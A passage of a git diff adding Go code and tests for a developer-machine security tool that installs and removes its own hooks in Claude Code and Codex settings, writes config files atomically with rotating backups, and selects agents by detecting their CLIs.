len(ev.list)) + didRemove := false + for _, group := range ev.list { + if !group.IsObject() { + outGroups = append(outGroups, group.Raw) + continue + } + inner := group.Get("hooks").Array() + filtered := make([]string, 0, len(inner)) + groupChanged := false + for _, h := range inner { + if h.IsObject() && isManagedCommand(h.Get("command").String()) { + didRemove = true + groupChanged = true + continue + } + filtered = append(filtered, h.Raw) + } + if len(filtered) == 0 { + continue + } + if !groupChanged { + outGroups = 
append(outGroups, group.Raw) + continue + } + updated, err := sjson.SetRawBytes([]byte(group.Raw), "hooks", []byte(configedit.RawArray(filtered))) + if err != nil { + return nil + } + outGroups = append(outGroups, string(updated)) + } + if didRemove { + removed = append(removed, event.HookEvent(ev.key)) + } + if !didRemove { + continue + } + path := configedit.Path("hooks", ev.key) + if len(outGroups) == 0 { + next, err := configedit.Delete(d.json, path) + if err != nil { + return nil + } + d.json = next + continue + } + next, err := configedit.SetRaw(d.json, path, configedit.RawArray(outGroups)) + if err != nil { + return nil + } + d.json = next + } + + if hooks := gjson.GetBytes(d.json, "hooks"); hooks.IsObject() { + empty := true + hooks.ForEach(func(k, v gjson.Result) bool { + empty = false + return false + }) + if empty { + next, err := configedit.Delete(d.json, "hooks") + if err == nil { + d.json = next + } + } + } + + slices.SortFunc(removed, func(a, b event.HookEvent) int { + switch { + case a < b: + return -1 + case a > b: + return 1 + } + return 0 + }) + return removed +} + +// writeHooksAtomic installs doc.json through atomicfile. When the +// upsert pipeline produced no structural change, doc.json is +// byte-identical to doc.orig and the call is a complete no-op (no +// backup, no write, returns nil result). Otherwise the entire file is +// pretty-printed with 2-space indent so the result is human-readable. 
+func writeHooksAtomic(path string, doc *hooksDoc) (*atomicfile.WriteResult, error) { + if !json.Valid(doc.json) { + return nil, fmt.Errorf("codex hooks: invalid JSON after edit") + } + if bytes.Equal(doc.json, doc.orig) { + return nil, nil + } + out := pretty.PrettyOptions(doc.json, &pretty.Options{Indent: " ", Width: 80}) + if bytes.Equal(out, doc.orig) { + return nil, nil + } + mode := atomicfile.PickMode(path, settingsMode) + wr, err := atomicfile.WriteAtomic(path, out, mode) + if err != nil { + return nil, err + } + return &wr, nil +} + +// loadConfigTOMLBytes reads ~/.codex/config.toml and returns the raw +// bytes. We do NOT round-trip through go-toml's marshaller for writes +// because that reorders keys and discards comments. Callers patch the +// bytes via configedit.EnsureCodexHooksFlag. +// +// Missing files return (nil, nil). Malformed TOML is rejected here so +// install can abort BEFORE hooks.json is touched (multi-file safety; +// see TestInstallMalformedTOMLDoesNotMutateHooks). +func loadConfigTOMLBytes(path string) ([]byte, error) { + b, err := os.ReadFile(path) + if err != nil { + if errors.Is(err, fs.ErrNotExist) { + return nil, nil + } + return nil, fmt.Errorf("codex config read: %w", err) + } + probe := map[string]any{} + if len(bytes.TrimSpace(b)) > 0 { + if err := toml.Unmarshal(b, &probe); err != nil { + return nil, fmt.Errorf("codex config parse: %w", err) + } + } + return b, nil +} + +// writeConfigAtomic installs encoded as the new config.toml contents +// via atomicfile. Returns nil, nil when encoded is byte-identical to +// the existing file (no-op). 
+func writeConfigAtomic(path string, encoded []byte) (*atomicfile.WriteResult, error) { + existing, err := os.ReadFile(path) + if err == nil && bytes.Equal(existing, encoded) { + return nil, nil + } + mode := atomicfile.PickMode(path, settingsMode) + wr, err := atomicfile.WriteAtomic(path, encoded, mode) + if err != nil { + return nil, err + } + return &wr, nil +} + diff --git a/internal/aiagents/atomicfile/atomicfile.go b/internal/aiagents/atomicfile/atomicfile.go new file mode 100644 index 0000000..cf4f074 --- /dev/null +++ b/internal/aiagents/atomicfile/atomicfile.go @@ -0,0 +1,225 @@ +// Package atomicfile writes files using a temp-file + rename discipline so +// readers never observe a half-written state. +// +// Atomic-write order: create temp in target dir → write → fsync → close → +// chmod → rename. Any existing file at the target is copied to a sibling +// backup (`.dmg-.bak`) before the rename. +// +// Ownership is intentionally NOT this package's concern. Under root +// install, the caller (the install handler) chowns the result to the +// console user — WriteResult exposes every path we wrote or created so +// the caller has the full set without having to walk the filesystem. +// +// The `Restore`, `RestoreOptions`, `RestoreResult`, and `ListBackups` +// operations are omitted — `hooks restore` is not in scope. +package atomicfile + +import ( + "fmt" + "os" + "path/filepath" + "sort" + "time" +) + +// BackupPrefix is the literal between the original path and the timestamp +// on backup files. BackupExt is the trailing extension. Together they +// produce: `.dmg-.bak`. The `.bak` ending is the +// conventional backup marker most editors and gitignore templates already +// recognize; the `dmg-` token identifies the file as ours. +const ( + BackupPrefix = ".dmg-" + BackupExt = ".bak" +) + +// BackupStampLayout is the time.Format layout used in backup filenames. +// UTC is mandatory so backups sort chronologically across timezones. 
+const BackupStampLayout = "20060102T150405" + +// MaxBackups caps per-target backup retention. After TakeBackup creates +// a new backup, older DMG-owned backups for the same target are deleted +// so at most MaxBackups remain (newest by mtime). Both the current +// `.dmg-.bak` form and the legacy `.dmg-backup.` +// form count toward the same cap so the rotation gradually cleans up +// files left from before the rename. +const MaxBackups = 3 + +// WriteResult reports every path WriteAtomic touched. The install handler +// uses CreatedDirs + Path + BackupPath to chown new files under root. +type WriteResult struct { + Path string // the target file we wrote + BackupPath string // "" when no pre-existing file was backed up + CreatedDirs []string // every parent dir we mkdir'd (deepest last); empty if all parents existed +} + +// PickMode returns the existing file's permission bits, or fallback if the +// file does not exist. Used so reinstalls preserve a user-tightened mode +// instead of clobbering with the default. +func PickMode(path string, fallback os.FileMode) os.FileMode { + info, err := os.Stat(path) + if err != nil { + return fallback.Perm() + } + return info.Mode().Perm() +} + +// TakeBackup copies the existing file at path to a sibling +// `.dmg-.bak`. Returns "" with nil error if the source +// does not exist (the common first-install case). 
+func TakeBackup(path string, now time.Time) (string, error) { + info, err := os.Stat(path) + if err != nil { + if os.IsNotExist(err) { + return "", nil + } + return "", err + } + if info.IsDir() { + return "", fmt.Errorf("atomicfile: %s is a directory, not a file", path) + } + data, err := os.ReadFile(path) + if err != nil { + return "", err + } + backupPath := path + BackupPrefix + now.UTC().Format(BackupStampLayout) + BackupExt + if err := os.WriteFile(backupPath, data, info.Mode().Perm()); err != nil { + return "", err + } + pruneBackups(path, MaxBackups) + return backupPath, nil +} + +// pruneBackups deletes older DMG-owned backups for path so at most keep +// remain (newest by mtime). Both the current `.dmg-*.bak` form and the +// legacy `.dmg-backup.*` form go in the same pool — the cap holds across +// the rename so legacy files don't linger forever. +// +// Best-effort: stat/remove errors are swallowed. Rotation must not fail +// the surrounding write — at worst a few extra backups stick around. +func pruneBackups(path string, keep int) { + pool := []string{} + for _, pattern := range []string{path + BackupPrefix + "*" + BackupExt, path + ".dmg-backup.*"} { + m, _ := filepath.Glob(pattern) + pool = append(pool, m...) + } + if len(pool) <= keep { + return + } + type entry struct { + name string + mtime time.Time + } + entries := make([]entry, 0, len(pool)) + for _, p := range pool { + info, err := os.Stat(p) + if err != nil { + continue + } + entries = append(entries, entry{p, info.ModTime()}) + } + sort.Slice(entries, func(i, j int) bool { return entries[i].mtime.After(entries[j].mtime) }) + for i := keep; i < len(entries); i++ { + _ = os.Remove(entries[i].name) + } +} + +// WriteAtomic writes data to path atomically. Parent directories are +// created (and reported) as needed; any existing file is backed up first. +// +// The temp file lives in the target directory (same filesystem) so the +// final rename is atomic on POSIX. 
+func WriteAtomic(path string, data []byte, mode os.FileMode) (WriteResult, error) { + result := WriteResult{Path: path} + + backup, err := TakeBackup(path, time.Now()) + if err != nil { + return result, fmt.Errorf("atomicfile: backup: %w", err) + } + result.BackupPath = backup + + parent := filepath.Dir(path) + created, err := mkdirAllTracking(parent, 0o755) + if err != nil { + return result, fmt.Errorf("atomicfile: mkdir parents: %w", err) + } + result.CreatedDirs = created + + tmp, err := os.CreateTemp(parent, "."+filepath.Base(path)+".tmp-*") + if err != nil { + return result, fmt.Errorf("atomicfile: create temp: %w", err) + } + tmpPath := tmp.Name() + + // Best-effort cleanup if anything below fails. Ignored on the success + // path because rename consumes the temp. + defer func() { + if _, statErr := os.Stat(tmpPath); statErr == nil { + _ = os.Remove(tmpPath) + } + }() + + if _, err := tmp.Write(data); err != nil { + _ = tmp.Close() + return result, fmt.Errorf("atomicfile: write temp: %w", err) + } + if err := tmp.Sync(); err != nil { + _ = tmp.Close() + return result, fmt.Errorf("atomicfile: fsync temp: %w", err) + } + if err := tmp.Close(); err != nil { + return result, fmt.Errorf("atomicfile: close temp: %w", err) + } + if err := os.Chmod(tmpPath, mode.Perm()); err != nil { + return result, fmt.Errorf("atomicfile: chmod temp: %w", err) + } + if err := os.Rename(tmpPath, path); err != nil { + return result, fmt.Errorf("atomicfile: rename: %w", err) + } + + return result, nil +} + +// InstallBytes is a thin alias used at install sites to make intent clear: +// "install these bytes at this path." Implementation is identical to +// WriteAtomic. +func InstallBytes(path string, data []byte, mode os.FileMode) (WriteResult, error) { + return WriteAtomic(path, data, mode) +} + +// mkdirAllTracking creates path (and any missing ancestors) with the given +// perm, returning only the directories it actually created — existing +// dirs are excluded. 
Order is shallowest-first so chown can apply parent +// before child without TOCTOU concerns. +func mkdirAllTracking(path string, perm os.FileMode) ([]string, error) { + var toCreate []string + cur := filepath.Clean(path) + + for { + info, err := os.Stat(cur) + switch { + case err == nil && info.IsDir(): + // Reached an existing dir — stop walking up. + goto create + case err == nil: + return nil, fmt.Errorf("atomicfile: %s exists but is not a directory", cur) + case !os.IsNotExist(err): + return nil, err + } + + toCreate = append([]string{cur}, toCreate...) + parent := filepath.Dir(cur) + if parent == cur { + // Hit filesystem root with no existing ancestor. + return nil, fmt.Errorf("atomicfile: cannot create %s: no existing ancestor", path) + } + cur = parent + } + +create: + for _, d := range toCreate { + if err := os.Mkdir(d, perm.Perm()); err != nil && !os.IsExist(err) { + return toCreate, err + } + } + return toCreate, nil +} diff --git a/internal/aiagents/atomicfile/atomicfile_test.go b/internal/aiagents/atomicfile/atomicfile_test.go new file mode 100644 index 0000000..c0e6711 --- /dev/null +++ b/internal/aiagents/atomicfile/atomicfile_test.go @@ -0,0 +1,362 @@ +package atomicfile + +import ( + "os" + "path/filepath" + "strings" + "testing" + "time" +) + +func TestPickMode_NoExistingFile(t *testing.T) { + dir := t.TempDir() + got := PickMode(filepath.Join(dir, "nope"), 0o600) + if got != 0o600 { + t.Errorf("PickMode on missing file = %o, want fallback 0o600", got) + } +} + +func TestPickMode_PreservesExistingMode(t *testing.T) { + dir := t.TempDir() + path := filepath.Join(dir, "f") + if err := os.WriteFile(path, []byte("x"), 0o640); err != nil { + t.Fatal(err) + } + got := PickMode(path, 0o644) + if got != 0o640 { + t.Errorf("PickMode = %o, want existing mode 0o640", got) + } +} + +func TestTakeBackup_NoSource(t *testing.T) { + dir := t.TempDir() + got, err := TakeBackup(filepath.Join(dir, "missing"), time.Now()) + if err != nil { + t.Fatal(err) + } + if 
got != "" { + t.Errorf("expected empty backup path for missing source, got %q", got) + } +} + +func TestTakeBackup_ProducesCorrectShape(t *testing.T) { + dir := t.TempDir() + src := filepath.Join(dir, "settings.json") + if err := os.WriteFile(src, []byte(`{"old":true}`), 0o644); err != nil { + t.Fatal(err) + } + + stamp := time.Date(2026, 5, 5, 12, 34, 56, 0, time.UTC) + got, err := TakeBackup(src, stamp) + if err != nil { + t.Fatal(err) + } + want := src + ".dmg-20260505T123456.bak" + if got != want { + t.Errorf("backup path = %q, want %q", got, want) + } + + // Backup contents must match the source. + data, err := os.ReadFile(got) + if err != nil { + t.Fatal(err) + } + if string(data) != `{"old":true}` { + t.Errorf("backup content mismatch: %q", string(data)) + } +} + +func TestWriteAtomic_FreshInstall_NoBackup(t *testing.T) { + dir := t.TempDir() + path := filepath.Join(dir, "hooks.json") + res, err := WriteAtomic(path, []byte("{}"), 0o600) + if err != nil { + t.Fatal(err) + } + if res.BackupPath != "" { + t.Errorf("expected no backup on fresh install, got %q", res.BackupPath) + } + if res.Path != path { + t.Errorf("Path = %q, want %q", res.Path, path) + } + + got, err := os.ReadFile(path) + if err != nil { + t.Fatal(err) + } + if string(got) != "{}" { + t.Errorf("file content = %q, want %q", string(got), "{}") + } + + info, err := os.Stat(path) + if err != nil { + t.Fatal(err) + } + if info.Mode().Perm() != 0o600 { + t.Errorf("file mode = %o, want 0o600", info.Mode().Perm()) + } +} + +func TestWriteAtomic_OverwriteWithBackup(t *testing.T) { + dir := t.TempDir() + path := filepath.Join(dir, "settings.json") + if err := os.WriteFile(path, []byte("OLD"), 0o644); err != nil { + t.Fatal(err) + } + + res, err := WriteAtomic(path, []byte("NEW"), 0o644) + if err != nil { + t.Fatal(err) + } + if res.BackupPath == "" { + t.Fatal("expected a backup path when target file pre-existed") + } + if !strings.Contains(res.BackupPath, ".dmg-") || !strings.HasSuffix(res.BackupPath, 
".bak") { + t.Errorf("backup path missing rebrand: %q", res.BackupPath) + } + + gotNew, _ := os.ReadFile(path) + if string(gotNew) != "NEW" { + t.Errorf("target file = %q, want %q", string(gotNew), "NEW") + } + gotOld, _ := os.ReadFile(res.BackupPath) + if string(gotOld) != "OLD" { + t.Errorf("backup file = %q, want %q", string(gotOld), "OLD") + } +} + +func TestWriteAtomic_CreatesParentDirsAndReportsThem(t *testing.T) { + dir := t.TempDir() + deep := filepath.Join(dir, "a", "b", "c", "settings.json") + + res, err := WriteAtomic(deep, []byte("{}"), 0o600) + if err != nil { + t.Fatal(err) + } + + wantCreated := []string{ + filepath.Join(dir, "a"), + filepath.Join(dir, "a", "b"), + filepath.Join(dir, "a", "b", "c"), + } + if len(res.CreatedDirs) != len(wantCreated) { + t.Fatalf("CreatedDirs = %v, want %v", res.CreatedDirs, wantCreated) + } + for i, w := range wantCreated { + if res.CreatedDirs[i] != w { + t.Errorf("CreatedDirs[%d] = %q, want %q", i, res.CreatedDirs[i], w) + } + } + + if _, err := os.Stat(deep); err != nil { + t.Errorf("file not created: %v", err) + } +} + +func TestWriteAtomic_DoesNotReportPreexistingParents(t *testing.T) { + dir := t.TempDir() + // dir already exists; writing directly under it should report nothing. + path := filepath.Join(dir, "hooks.json") + res, err := WriteAtomic(path, []byte("{}"), 0o600) + if err != nil { + t.Fatal(err) + } + if len(res.CreatedDirs) != 0 { + t.Errorf("expected empty CreatedDirs when parent existed, got %v", res.CreatedDirs) + } +} + +// listBackups returns every backup sibling of src that the rotation +// considers part of the pool (.dmg-*.bak + legacy .dmg-backup.*). +// Anything else in the directory is ignored. +func listBackups(t *testing.T, src string) []string { + t.Helper() + var out []string + for _, pattern := range []string{src + ".dmg-*.bak", src + ".dmg-backup.*"} { + m, err := filepath.Glob(pattern) + if err != nil { + t.Fatal(err) + } + out = append(out, m...) 
+ } + return out +} + +// writeBackupAt creates a backup file at path with mtime set to ts. The +// content is irrelevant; rotation sorts by mtime, not contents. +func writeBackupAt(t *testing.T, path string, ts time.Time) { + t.Helper() + if err := os.WriteFile(path, []byte("old"), 0o600); err != nil { + t.Fatal(err) + } + if err := os.Chtimes(path, ts, ts); err != nil { + t.Fatal(err) + } +} + +func TestTakeBackup_PrunesPastCap(t *testing.T) { + dir := t.TempDir() + src := filepath.Join(dir, "settings.json") + if err := os.WriteFile(src, []byte("CURRENT"), 0o600); err != nil { + t.Fatal(err) + } + + // Five pre-existing backups with strictly increasing mtimes. Names + // embed the same stamps so debugging output is readable, but the + // prune sorts by mtime, not by name. + base := time.Date(2026, 5, 1, 12, 0, 0, 0, time.UTC) + for i := range 5 { + ts := base.Add(time.Duration(i) * time.Hour) + writeBackupAt(t, src+BackupPrefix+ts.Format(BackupStampLayout)+BackupExt, ts) + } + + // New backup is taken "now" (later than all pre-existing mtimes). + now := base.Add(24 * time.Hour) + got, err := TakeBackup(src, now) + if err != nil { + t.Fatal(err) + } + + survivors := listBackups(t, src) + if len(survivors) != MaxBackups { + t.Fatalf("expected %d survivors after prune, got %d: %v", MaxBackups, len(survivors), survivors) + } + + // Survivors must include the freshly-taken one + the two + // most-recent pre-existing backups (hours +3 and +4). 
+ want := map[string]bool{ + got: true, + src + BackupPrefix + base.Add(3*time.Hour).Format(BackupStampLayout) + BackupExt: true, + src + BackupPrefix + base.Add(4*time.Hour).Format(BackupStampLayout) + BackupExt: true, + } + for _, s := range survivors { + if !want[s] { + t.Errorf("unexpected survivor %q", s) + } + delete(want, s) + } + for missing := range want { + t.Errorf("expected survivor missing: %q", missing) + } +} + +func TestTakeBackup_PruneAcrossLegacyAndNewFormats(t *testing.T) { + dir := t.TempDir() + src := filepath.Join(dir, "hooks.json") + if err := os.WriteFile(src, []byte("CURRENT"), 0o600); err != nil { + t.Fatal(err) + } + + // Two legacy + two new-form, all older than the upcoming TakeBackup. + base := time.Date(2026, 5, 1, 12, 0, 0, 0, time.UTC) + legacyOldest := src + ".dmg-backup." + base.Format(BackupStampLayout) + writeBackupAt(t, legacyOldest, base) + legacyNewer := src + ".dmg-backup." + base.Add(time.Hour).Format(BackupStampLayout) + writeBackupAt(t, legacyNewer, base.Add(time.Hour)) + newOlder := src + BackupPrefix + base.Add(2*time.Hour).Format(BackupStampLayout) + BackupExt + writeBackupAt(t, newOlder, base.Add(2*time.Hour)) + newNewest := src + BackupPrefix + base.Add(3*time.Hour).Format(BackupStampLayout) + BackupExt + writeBackupAt(t, newNewest, base.Add(3*time.Hour)) + + now := base.Add(24 * time.Hour) + got, err := TakeBackup(src, now) + if err != nil { + t.Fatal(err) + } + + survivors := listBackups(t, src) + if len(survivors) != MaxBackups { + t.Fatalf("expected %d survivors, got %d: %v", MaxBackups, len(survivors), survivors) + } + // Newest 3 = the just-taken one + newNewest + newOlder. Both + // legacy entries (older mtimes) must be pruned, demonstrating + // the cap holds across the format rename. 
+ survSet := map[string]bool{} + for _, s := range survivors { + survSet[s] = true + } + for _, want := range []string{got, newNewest, newOlder} { + if !survSet[want] { + t.Errorf("expected survivor missing: %q", want) + } + } + for _, gone := range []string{legacyOldest, legacyNewer} { + if _, err := os.Stat(gone); !os.IsNotExist(err) { + t.Errorf("expected legacy backup pruned: %q (stat err=%v)", gone, err) + } + } +} + +func TestTakeBackup_DoesNotTouchUnrelatedSiblings(t *testing.T) { + dir := t.TempDir() + src := filepath.Join(dir, "settings.json") + if err := os.WriteFile(src, []byte("CURRENT"), 0o600); err != nil { + t.Fatal(err) + } + + // Four pre-existing DMG backups so the prune is forced to delete one. + base := time.Date(2026, 5, 1, 12, 0, 0, 0, time.UTC) + for i := range 4 { + ts := base.Add(time.Duration(i) * time.Hour) + writeBackupAt(t, src+BackupPrefix+ts.Format(BackupStampLayout)+BackupExt, ts) + } + + // Files the rotation must NOT touch: a different tool's backup, a + // user-named sibling, and a file with a different stem. + anchor := src + ".anchor-backup.20260501T120000" + userKeep := src + ".user-keep" + otherStem := filepath.Join(dir, "other.json.dmg-20260501T120000.bak") + for _, p := range []string{anchor, userKeep, otherStem} { + if err := os.WriteFile(p, []byte("keep"), 0o600); err != nil { + t.Fatal(err) + } + } + + if _, err := TakeBackup(src, base.Add(24*time.Hour)); err != nil { + t.Fatal(err) + } + + // Survivors of the DMG pool: cap honored. + if got := len(listBackups(t, src)); got != MaxBackups { + t.Errorf("DMG backup count after prune: got %d, want %d", got, MaxBackups) + } + // Unrelated files must all still exist. 
+ for _, p := range []string{anchor, userKeep, otherStem} { + if _, err := os.Stat(p); err != nil { + t.Errorf("unrelated sibling pruned: %q: %v", p, err) + } + } +} + +func TestTakeBackup_NoOpUnderCap(t *testing.T) { + dir := t.TempDir() + src := filepath.Join(dir, "settings.json") + if err := os.WriteFile(src, []byte("CURRENT"), 0o600); err != nil { + t.Fatal(err) + } + + // One pre-existing backup; combined with the new one we'll be at 2, + // still under MaxBackups. + pre := src + BackupPrefix + "20260501T120000" + BackupExt + writeBackupAt(t, pre, time.Date(2026, 5, 1, 12, 0, 0, 0, time.UTC)) + + got, err := TakeBackup(src, time.Date(2026, 5, 2, 12, 0, 0, 0, time.UTC)) + if err != nil { + t.Fatal(err) + } + + survivors := listBackups(t, src) + if len(survivors) != 2 { + t.Fatalf("expected 2 survivors when under cap, got %d: %v", len(survivors), survivors) + } + survSet := map[string]bool{} + for _, s := range survivors { + survSet[s] = true + } + if !survSet[pre] { + t.Errorf("pre-existing backup pruned despite under-cap: %q", pre) + } + if !survSet[got] { + t.Errorf("freshly-taken backup missing: %q", got) + } +} diff --git a/internal/aiagents/cli/detect.go b/internal/aiagents/cli/detect.go new file mode 100644 index 0000000..96c09b9 --- /dev/null +++ b/internal/aiagents/cli/detect.go @@ -0,0 +1,98 @@ +package cli + +import ( + "context" + "fmt" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter/claudecode" + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter/codex" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// SupportedAgents is the canonical list of agent names accepted by +// `--agent`. Order matters for user-facing diagnostics (the `unsupported +// agent` error lists them in this order) and for the default fan-out +// in selectAdapters. 
+// +// Adding a new agent means: append here, add a case in adapterForAgent, +// add the constructor case in allAdapters, and add the adapter package. +// No other changes are needed in this layer. +var SupportedAgents = []string{ + claudecode.AgentName, + codex.AgentName, +} + +// adapterForAgent maps an explicit agent name onto a constructed +// adapter. The single CLI seam between the user-facing `--agent` flag +// and the per-agent constructor. +// +// home is the user's home directory (each adapter computes its own +// settings paths from it). binaryPath is the absolute, symlink-resolved +// DMG binary path that adapters embed into the hook command they write +// to settings. +// +// Unsupported agents produce an error that names every supported agent +// so the user does not have to read source to learn the option list. +func adapterForAgent(agent, home, binaryPath string) (adapter.Adapter, error) { + switch agent { + case claudecode.AgentName: + return claudecode.New(home, binaryPath), nil + case codex.AgentName: + return codex.New(home, binaryPath), nil + default: + return nil, fmt.Errorf("unsupported agent %q (supported: %s, %s)", + agent, claudecode.AgentName, codex.AgentName) + } +} + +// allAdapters returns every adapter DMG knows about, in the order +// declared by SupportedAgents. Used by selectAdapters when the caller +// did not pin a specific agent so we fan out across whichever agents +// are actually present on disk. +func allAdapters(home, binaryPath string) []adapter.Adapter { + return []adapter.Adapter{ + claudecode.New(home, binaryPath), + codex.New(home, binaryPath), + } +} + +// selectAdapters resolves the install/uninstall target list from the +// `--agent` flag: +// +// - explicit agent: yields exactly that adapter, skipping detection. 
+// The user's explicit `--agent claude-code` is an unconditional +// opt-in — install proceeds even when the agent's CLI is not on +// $PATH (the user may install it later, or installs it in a +// non-PATH location and runs DMG from a wrapper). +// +// - empty agent: runs Detect across every known adapter; only those +// whose CLI binary `executor.LookPath` resolves are returned. +// Settings file presence is NOT a gate — the adapter creates its +// settings file from scratch on first install. +// +// Detect errors abort the whole selection: an unexpected error here +// (e.g. the executor itself broke) should not be silently swallowed +// into "no agents detected". Plain "not on $PATH" results, by +// contrast, are normal and produce Detected=false with a nil error +// from the adapter. +func selectAdapters(ctx context.Context, agent, home, binaryPath string, exec executor.Executor) ([]adapter.Adapter, error) { + if agent != "" { + a, err := adapterForAgent(agent, home, binaryPath) + if err != nil { + return nil, err + } + return []adapter.Adapter{a}, nil + } + var detected []adapter.Adapter + for _, a := range allAdapters(home, binaryPath) { + res, err := a.Detect(ctx, exec) + if err != nil { + return nil, fmt.Errorf("detect %s: %w", a.Name(), err) + } + if res.Detected { + detected = append(detected, a) + } + } + return detected, nil +} diff --git a/internal/aiagents/cli/detect_test.go b/internal/aiagents/cli/detect_test.go new file mode 100644 index 0000000..d749cea --- /dev/null +++ b/internal/aiagents/cli/detect_test.go @@ -0,0 +1,170 @@ +package cli + +import ( + "context" + "strings" + "testing" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +const testBinary = "/usr/local/bin/stepsecurity-dev-machine-guard" + +func TestAdapterForAgentClaudeCode(t *testing.T) { + a, err := adapterForAgent("claude-code", t.TempDir(), testBinary) + if err != nil { + t.Fatal(err) 
+ } + if a.Name() != "claude-code" { + t.Errorf("Name=%q", a.Name()) + } + if len(a.ManagedFiles()) != 1 { + t.Errorf("expected 1 managed file, got %v", a.ManagedFiles()) + } +} + +func TestAdapterForAgentCodex(t *testing.T) { + a, err := adapterForAgent("codex", t.TempDir(), testBinary) + if err != nil { + t.Fatal(err) + } + if a.Name() != "codex" { + t.Errorf("Name=%q", a.Name()) + } + if len(a.ManagedFiles()) != 2 { + t.Errorf("expected 2 managed files, got %v", a.ManagedFiles()) + } +} + +func TestAdapterForAgentUnsupportedListsBoth(t *testing.T) { + _, err := adapterForAgent("cursor", t.TempDir(), testBinary) + if err == nil { + t.Fatal("expected error") + } + msg := err.Error() + for _, want := range []string{"claude-code", "codex"} { + if !strings.Contains(msg, want) { + t.Errorf("error must mention %q, got %q", want, msg) + } + } + // The unsupported name itself must appear so the user sees what + // they typed. + if !strings.Contains(msg, "cursor") { + t.Errorf("error must echo the bad name; got %q", msg) + } +} + +func TestSupportedAgentsListIsCanonical(t *testing.T) { + want := []string{"claude-code", "codex"} + if len(SupportedAgents) != len(want) { + t.Fatalf("SupportedAgents len: got %v, want %v", SupportedAgents, want) + } + for i, n := range want { + if SupportedAgents[i] != n { + t.Errorf("SupportedAgents[%d]: got %q, want %q", i, SupportedAgents[i], n) + } + } +} + +func TestAllAdaptersReturnsBothInDeclaredOrder(t *testing.T) { + all := allAdapters(t.TempDir(), testBinary) + if len(all) != 2 { + t.Fatalf("expected 2 adapters, got %d", len(all)) + } + if all[0].Name() != "claude-code" { + t.Errorf("[0] Name=%q, want claude-code", all[0].Name()) + } + if all[1].Name() != "codex" { + t.Errorf("[1] Name=%q, want codex", all[1].Name()) + } +} + +// TestSelectAdaptersExplicitAgentSkipsDetection: an explicit `--agent +// claude-code` is an unconditional opt-in. The user's claude binary +// may not be on $PATH (e.g. 
they're about to install it, or invoke it +// from an unusual location); we MUST still construct and return that +// adapter. +func TestSelectAdaptersExplicitAgentSkipsDetection(t *testing.T) { + mock := executor.NewMock() // empty PATH + got, err := selectAdapters(context.Background(), "claude-code", t.TempDir(), testBinary, mock) + if err != nil { + t.Fatal(err) + } + if len(got) != 1 || got[0].Name() != "claude-code" { + t.Errorf("explicit --agent claude-code: got %v, want [claude-code]", names(got)) + } + + got, err = selectAdapters(context.Background(), "codex", t.TempDir(), testBinary, mock) + if err != nil { + t.Fatal(err) + } + if len(got) != 1 || got[0].Name() != "codex" { + t.Errorf("explicit --agent codex: got %v, want [codex]", names(got)) + } +} + +func TestSelectAdaptersExplicitUnsupportedReturnsError(t *testing.T) { + mock := executor.NewMock() + _, err := selectAdapters(context.Background(), "cursor", t.TempDir(), testBinary, mock) + if err == nil { + t.Fatal("expected error on unsupported agent") + } +} + +// TestSelectAdaptersDetectsByLookPath asserts that detection is by +// `executor.LookPath`, NOT by settings file existence. Settings files +// must NOT be present in this test (TempDir is empty), and yet both +// adapters must show up because their CLI binaries are on $PATH. +func TestSelectAdaptersDetectsByLookPath(t *testing.T) { + mock := executor.NewMock() + mock.SetPath("claude", "/usr/local/bin/claude") + mock.SetPath("codex", "/usr/local/bin/codex") + + got, err := selectAdapters(context.Background(), "", t.TempDir(), testBinary, mock) + if err != nil { + t.Fatal(err) + } + if len(got) != 2 { + t.Fatalf("expected both detected, got %v", names(got)) + } + if got[0].Name() != "claude-code" || got[1].Name() != "codex" { + t.Errorf("order: got %v, want [claude-code codex]", names(got)) + } +} + +func TestSelectAdaptersFiltersUndetectedAgents(t *testing.T) { + // Only claude on $PATH — codex must be filtered out. 
+ mock := executor.NewMock() + mock.SetPath("claude", "/usr/local/bin/claude") + + got, err := selectAdapters(context.Background(), "", t.TempDir(), testBinary, mock) + if err != nil { + t.Fatal(err) + } + if len(got) != 1 || got[0].Name() != "claude-code" { + t.Errorf("got %v, want [claude-code]", names(got)) + } +} + +func TestSelectAdaptersNoneDetectedReturnsEmpty(t *testing.T) { + // Neither on $PATH — no error, just empty list. The install + // handler is responsible for emitting a "no agents detected" + // diagnostic. + mock := executor.NewMock() + got, err := selectAdapters(context.Background(), "", t.TempDir(), testBinary, mock) + if err != nil { + t.Fatal(err) + } + if len(got) != 0 { + t.Errorf("expected empty list when nothing on $PATH, got %v", names(got)) + } +} + +func names(adapters []adapter.Adapter) []string { + out := make([]string, len(adapters)) + for i, a := range adapters { + out[i] = a.Name() + } + return out +} diff --git a/internal/aiagents/cli/errlog.go b/internal/aiagents/cli/errlog.go new file mode 100644 index 0000000..e594b6e --- /dev/null +++ b/internal/aiagents/cli/errlog.go @@ -0,0 +1,108 @@ +package cli + +import ( + "encoding/json" + "os" + "path/filepath" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/redact" +) + +// ErrorLogFilename is the basename of the per-user errors log. It lives +// directly under ~/.stepsecurity/. +const ErrorLogFilename = "ai-agent-hook-errors.jsonl" + +// MaxErrorLogBytes triggers a truncate-and-restart before each append. +// At 5 MiB, individual entries < 4 KiB remain atomic on POSIX +// `O_APPEND` writes without advisory locks. +const MaxErrorLogBytes = 5 * 1024 * 1024 + +const ( + errorLogFileMode os.FileMode = 0o600 + errorLogParentDirMode os.FileMode = 0o700 +) + +// ErrorEntry is the JSONL shape of a single line in the errors log. 
+// Field tags are short to keep the file compact when something goes +// wrong on the hot path; eventID is omitted when not correlated to an +// upload. +type ErrorEntry struct { + Timestamp string `json:"ts"` + Stage string `json:"stage"` + Code string `json:"code"` + Message string `json:"message"` + EventID string `json:"event_id,omitempty"` +} + +// errorLogPathOverride redirects writes to a test-controlled location. +// "" means "use the default ~/.stepsecurity/ path." Only +// touched from same-package _test.go files; tests must restore on +// cleanup since this is package-level mutable state. +var errorLogPathOverride string + +// AppendError writes a single JSONL entry to the errors log. The call +// is best-effort: any failure (no $HOME, mkdir denied, marshal error, +// open denied, partial write) is silently dropped — the hot path's +// allow response must never be blocked by logging. +// +// The message is run through redact.String before being written to +// disk so a stray secret in an error message never lands in the +// on-disk log. +func AppendError(stage, code, message, 